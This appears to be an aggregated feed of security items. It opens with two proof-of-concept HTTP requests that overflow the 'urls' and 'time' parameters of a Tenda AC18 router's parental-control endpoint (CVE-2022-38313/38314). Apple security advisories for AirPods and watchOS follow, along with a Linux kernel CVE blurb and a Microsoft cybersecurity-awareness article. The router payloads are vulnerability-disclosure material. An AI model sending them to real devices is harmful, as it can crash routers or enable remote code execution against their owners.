    deviceId=02%3A03%3A04%3A05%3A06%3A07&deviceName=&enable=1&time=19%3A0021%3A00&url_enable=1&urls=ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss&day=1%2C1%2C1%2C1%2C1%2C1%2C1&limit_type=0
    

This PoC can result in a Dos.

CVE-2022-38314: NWPU_Projct/Tenda/AC18/1 at main · rickytriky/NWPU_Projct

Tenda AC18 router v15.03.05.19 and v15.03.05.05 was discovered to contain a stack overflow via the time parameter at /goform/saveParentControlInfo.

**Tenda AC18 Unauthorized stack overflow vulnerability******1\. Affected version:****

V15.03.05.05\_multi and V15.03.05.19\_multi

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

In function saveParentControlInfo, the content obtained by the program from the time parameter is passed to nptr, and then the nptr is directly copied into the V17 + 34 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

In order to reproduce the vulnerability, the following steps can be followed:

1.Use the fat simulation firmware V15.03.05.19\_multi

2.Attack with the following overflow POC attacks

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1467
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/parental_control.html?random=0.7639560863840195&
    Cookie: password=0d403f6ad9aea37a98da9255140dbf6ebyzcvb
    
    deviceId=02%3A03%3A04%3A05%3A06%3A07&deviceName=&enable=1&time=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111119%3A0021%3A00&url_enable=1&urls=baidu&day=1%2C1%2C1%2C1%2C1%2C1%2C1&limit_type=0
    

This PoC can result in a Dos.

CVE-2022-38313: NWPU_Projct/Tenda/AC18/2 at main · rickytriky/NWPU_Projct

Apple Security Advisory 06-25-2024-1 - AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8 address a spoofing vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPodsFirmware Update 6F8, and Beats Firmware Update 6F8AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, andBeats Firmware Update 6F8 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT214111.Apple maintains a Security Releases page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.BluetoothAvailable for: AirPods (2nd generation and later), AirPods Pro (allmodels), AirPods Max, Powerbeats Pro, and Beats Fit ProImpact: When your headphones are seeking a connection request to oneof your previously paired devices, an attacker in Bluetooth rangemight be able to spoof the intended source device and gain accessto your headphonesDescription: An authentication issue was addressed with improvedstate management.CVE-2024-27867: Jonas DreßlerFirmware updates are automatically delivered while your headphonesare paired with and in Bluetooth range of your iPhone, iPad, or Mac. You can check the firmware version of your wireless headphones inBluetooth settings on your device. On iPhone or iPad, go toSettings > Bluetooth. On Mac, go to System Settings > Bluetooth.Then tap the info button next to your headphones. Learn more about firmware updates for AirPods athttps://support.apple.com/106340Learn more about firmware updates for Beats athttps://support.apple.com/102368All information is also posted on the Apple Security Releasesweb site: https://support.apple.com/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmZ7kCwACgkQX+5d1TXaIvqORhAAsEgfOmEzguP2GofB8A1mvP7Mz8qwG8vVhlmc3Z7XhH0yQegpN13aQ9g3kEsu5KAeUJuId8sSgLwVZlNfLD/UVhR4xRdNQaJ5gVs0HydPUxr95tU2zAMQz/1wdJvST6tBcd0mEw9Rsqh4L8YATkuicy2Rctc8aKcXoqKLDop3J1H7/htv6t8vPtgwr59IyfzGWKuiNSeOArWwtbv2pbi6angogTJ3a8NwDBFzLg4stqCnAqgzIeBO32Tm+JwSknrElCRzcACQmcGDEElaI6A3ZFA6lP78gCXtW48dosHv/SC9J9TXOLK5JIWCWNHjFr+R/8w4ZoPYs0JJ/KlP2o++wEA8ew4cd7JTIIpV8oMRkHfJUzgRnkSM+5s8ZKULVvinzrBn5BnINXhYcWNms4hHgUGuFqTeNWRrVpy3vDKidFFFZh0c4bbbWaIKRFDmZop4NpucgoOka9h+dbrm8/LLTd0KK+IF0dfFArn+zo5UbeDu3dao38pP6qwO6U+1lFco5HodFzLAmECbIlE6VPUfwPHDoB+BApuehkka/qB2gZFIm4qIGRSzrQgQ3OGyI/RqUKfHigTxrxo1GUtXeTnLLbhIfPv9MvMwgvgRqt36liMYvksl+I17mWdRiNihwvsfpV6VliBCQm05nPJkp25g0h8j+aZfg0IdXFgzYMq7PmI==DvD4-----END PGP SIGNATURE-----

Apple Security Advisory 06-25-2024-1

An issue was discovered in the Linux kernel through 5.16-rc6. imx_register_uart_clocks in drivers/clk/imx/clk.c lacks check of the return value of kcalloc() and will cause the null pointer dereference.

'2153054?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-3114: Invalid Bug ID

Apple Security Advisory 2023-01-23-7 - watchOS 9.3 addresses bypass, code execution, and information leakage vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-01-23-7 watchOS 9.3

watchOS 9.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213599.

AppleMobileFileIntegrity  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2023-23499: Wojciech Regula of SecuRing (wojciechregula.blog)

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing an image may lead to a denial-of-service  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2023-23519: Yiğit Can YILMAZ (@yilmazcanyigit)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to leak sensitive kernel state  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23500: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to determine kernel memory layout  
Description: An information disclosure issue was addressed by  
removing the vulnerable code.  
CVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23504: Adam Doupé of ASU SEFCOM

Maps  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass Privacy preferences  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23503: an anonymous researcher

Safari  
Available for: Apple Watch Series 4 and later  
Impact: Visiting a website may lead to an app denial-of-service  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2023-23512: Adriatik Raci

Screen Time  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23505: Wojciech Reguła of SecuRing (wojciechregula.blog)

Weather  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass Privacy preferences  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an  
anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 245464  
CVE-2023-23496: ChengGang Wu, Yan Kang, YuHao Hu, Yue Sun, Jiming  
Wang, JiKai Ren and Hang Shu of Institute of Computing Technology,  
Chinese Academy of Sciences

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 248268  
CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE  
WebKit Bugzilla: 248268  
CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE

Additional recognition

Kernel  
We would like to acknowledge Nick Stenning of Replicate for their  
assistance.

WebKit  
We would like to acknowledge Eliya Stein of Confiant for their  
assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPPImAACgkQ4RjMIDke  
NxlPXQ//eXfTfjIg6Y/1b0u3+Ht29Qjn7kw6Gh296lh6jlGatQ8zXyk1dGl6MKcp  
ZTc7DFfL1VUN6MovOqW5qcR+MIV6hDiUd54ncDgjCXdHrtTG+bYchX5CJf5IIb67  
gZP/2bBt4PQ+PHm3KqXPp7QauJWYD1d7AHChwqEbYchHxvgedB7Pu6nJvG3bnFmh  
8ny/xrFEhtIDahw4MbicvK847aVpXyH6NxEoRY+8b9/4VocttfUPwMkGZTkVt/tz  
9qfmKgjWpX2mTP9iaLlZdCUV/I4HcjTW0/nkDoaTBVDLW96DSeIo4nMM3qkcygRl  
TPVlvm+3Nenib1b6PZ71B26IJbmGdwR02SEpUPDDXbTGZeWmcyXe7ncvwSIbcGRI  
sPGMq6mEPi+rKTXKZeqPSDFnUlZJna2aNg9fPL9AZ1gwfNSbuhh5ZKQ9AAWA+k51  
4QtoReAKUXinl8vr7BNVQSJSiZLMdgph4nCTYk1RA/VHDPjwaAJehDFUqKKKTuvp  
h59J8OSw0HaWP2NcMEglO4/EXj09E3gfveQ74KtG+eDbBMKa+RArIgOZZaDOk2F1  
6Fs316bNBI9tMxP34gFEvexTTBuQpoR/76pSQajlaSdas5Jeub2QeJVHkBPMdatD  
HBbjpZhu4JcYqDVSDt58Ra5IsaM+OLkhvvCfi+UYxOiyZis3gn8=  
=/vLS  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-01-23-7

Organizations should focus on four key areas to advance employee education and "cyber smartness."

This month we celebrate the 20th anniversary of Cybersecurity Awareness Month — a dedicated time for industry, government, academia, and nonprofits to come together and raise awareness about the importance of cybersecurity for everyone.

Since its creation, Cybersecurity Awareness Month has grown from a national US initiative to a global movement that educates individuals and organizations about best practices and promotes a culture of cybersecurity. By dedicating a specific month to awareness, the industry encourages proactive measures, knowledge-sharing, and collective responsibility — ultimately helping more people envision their roles in cybersecurity and in making organizations and the world safer.

Cybersecurity knowledge-sharing is particularly important, as human risk has become one of the strongest vectors that modern security organizations must contend with. Today it accounts for more than 80% of cybersecurity incidents. Companies must find an effective way to uplevel cybersecurity education across the entire organization — not just within their security teams — if we hope to strengthen our collective security postures.

Read on to learn how technology can help security teams drive greater results, and explore key behaviors to focus on when spreading cybersecurity awareness across your organization.

**4 User Behaviors to Emphasize In Cybersecurity Education Materials**

At its core, cybersecurity awareness is about managing human risk. Companies can help advance this mission by providing cybersecurity education and skilling resources across their organizations. Education can include tips ranging from the fundamentals of cyber hygiene to day-to-day behaviors, such as identifying and avoiding tech support scams, advice on improving data and device security practices, and more.

In honor of Cybersecurity Awareness Month, here are the top four areas that Microsoft recommends focusing on to advance employee education and "cyber smartness."

**Enabling Multifactor Authentication

Multifactor authentication (MFA) can protect against 99.2% of attacks by offering stronger security than traditional passwords. As such, it's an incredible tool in the average employee's arsenal to uplevel security practices across your organization. We recommend periodically reminding users to enable MFA measures, such as biometrics or single-use codes, across their devices, apps, and account settings.

****Strengthening the Sign-In Process**

Along the same lines, it's important to remember that hackers don't break in. They sign in. If passwordless authentication is not an option, encourage employees to create stronger passwords using their browser's password generator. Length matters more than complexity here, so any passwords created should be at least 12 characters long. A password manager can be particularly helpful in tracking all current passwords.

**Updating Software**

Keeping software current with the latest security updates and patches is a vital step in protecting Internet-connected devices. On the individual user level, employees should be encouraged to set up automatic software updates to decrease the risk of vulnerabilities that can lead to ransomware and other malware. Likewise, consider creating an educational pamphlet that teaches employees how to check privacy and security settings against your desired level of information-sharing any time they register a new account, download an app, or acquire a new device.

**Recognizing and Reporting Phishing**

Finally, phishing scams are a significant threat vector that criminal actors leverage to infiltrate networks and steal sensitive data. Employees should be educated on best practices to avoid phishing scams, such as checking the sender's email address for verifiable contact information or an unrelated sender address and verifying the sender before clicking on links or opening email attachments. 

While the above tips are focused on changing user behaviors, technology has a role to play, too. Innovation is critical in creating new efficiencies for already overburdened security teams. By embracing leading technology advancements, such as generative AI, security teams can simplify complex toolsets and surface deeper insights across their entire data estates to better monitor threat activity in real time. This combination of leading technical innovations and broader user education can help empower security teams to streamline workflows and focus more of their time on the day-to-day work of cyber defense.

We invite you to leverage cybersecurity awareness not only this month, but all year round, to make sure everyone in your organizations is empowered to be cyber smart and assume a role in fighting cyber threats.

This Cybersecurity Awareness Month, Don't Lose Sight of Human Risk

Apple Security Advisory 01-22-2024-8 - watchOS 10.3 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-8 watchOS 10.3

watchOS 10.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214060.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 9 and  
Apple Watch Ultra 2  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto  
Available for: Apple Watch Series 4 and later  
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5  
ciphertexts without having the private key  
Description: A timing side-channel issue was addressed with improvements  
to constant-time computation in cryptographic functions.  
CVE-2024-23218: Clemens Lang

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of  
Legendsec at QI-ANXIN Group

Mail Search  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and  
Ian de Marcellus

NSSpellChecker  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved handling of  
files.  
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Safari  
Available for: Apple Watch Series 4 and later  
Impact: A user's private browsing activity may be visible in Settings  
Description: A privacy issue was addressed with improved handling of  
user preferences.  
CVE-2024-23211: Mark Bowers

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: A shortcut may be able to use sensitive data with certain  
actions without prompting the user  
Description: The issue was addressed with additional permissions checks.  
CVE-2024-23204: Jubaer Alnazi (@h33tjubaer)

Shortcuts  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass certain Privacy preferences  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2024-23217: Kirin (@Pwnrin)

TCC  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: An issue was addressed with improved handling of temporary  
files.  
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to view a user's phone number in system logs  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An access issue was addressed with improved access  
restrictions.  
WebKit Bugzilla: 262699  
CVE-2024-23206: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 266619  
CVE-2024-23213: Wangtaiyu of Zhongfu info

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDqsACgkQX+5d1TXa  
IvqR0Q//a137PlcPioIws/A02XClBQtF95fwuaz7DEhi79XZvH1q1+N3EYd/1b8l  
YkGdXQik8uS4zpB4KBJ+8cRYqaNaMDO0lNr2RdGgUInMd2bc+HBHigxEY47Wzbr2  
UT3r2uJW70HalBNrGNOj15JQTQ4MhbjjTq/ezrIdCFTo1RHk9vOc//AajbDtWiQp  
X5jGhoGzDB378vswEEyp4OjArh5v2xEv5hcoIvrzlgkSz9aRwzLgluR7sXGifE6O  
vU7zP2oT36zwBAfTsY1CkarTeQprQ4iyiEIlDzwxr+Z2ooGUmOStzsQtuU28QSQK  
sl0b42V7mkTFWVCXymsjCBbGw/JPSkGzptOPNqoEtBddiMuLU2BGBWk51xa5cEzy  
tsLWd1vlnUms3CqM6QvOxdj3mzs4wzxha941a0h67lR7NeR09CqflKsr7vDFWOBY  
PdVAUSDRxeM1rntVJfFJAkssUV14TGSTDwqMQmiUyxqXfKymSc4dCqIDLyqcdblB  
wNtwKFlstCZxcmc2V0zfDWHJ0y75sTUUhlk3AvH/OeVve9rhDvtKdoKDHdOauKHw  
kss00oy5TLkeTYi26oJfEMtts7BS+8ZEF3cLNxOBZ/cdIO1+Ifl8jNcluTLlC8F7  
4MxcjC8prTl0aZ4sqJfcUBLnqkMdn0GaqXOPXSa6hQxiNc5dcIk=  
=hoM+  
-----END PGP SIGNATURE-----

Search

lenovo warranty check/lookup | check warranty status | lenovo support us